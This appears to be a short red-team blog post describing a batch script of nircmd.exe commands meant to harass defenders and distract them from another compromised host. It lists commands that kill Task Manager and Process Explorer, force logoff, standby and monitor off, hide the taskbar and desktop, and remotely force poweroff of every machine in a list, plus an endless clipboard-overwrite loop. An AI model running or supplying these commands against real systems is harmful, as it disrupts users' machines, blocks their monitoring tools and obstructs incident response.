Psychological Warfare with NirCMD


One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:

  • setdisplay 640x480
  • killprocess taskmgr.exe
  • killprocess procexp.exe
  • win -style title “my computer” 0x00c00000
  • win child title “my computer” +exstyle all 0x00400000
  • win +exstyle title “my computer” 0x00400000
  • win trans ititle “internet explorer” 256
  • win close class “CabinetWClass”
  • multiremote copy “c:tempcomputers.txt” exitwin poweroff force
  • exitwin logoff
  • standby
  • monitor off
  • win child class “Shell_TrayWnd” hide class “button”
  • win hide class progman

Just to name a few…

another fun batch script to have running is ’echo knock knock | clip’ in an endless and delayless loop. (I makes ‘knock knock’ the only thing that will ever be pasted ;-)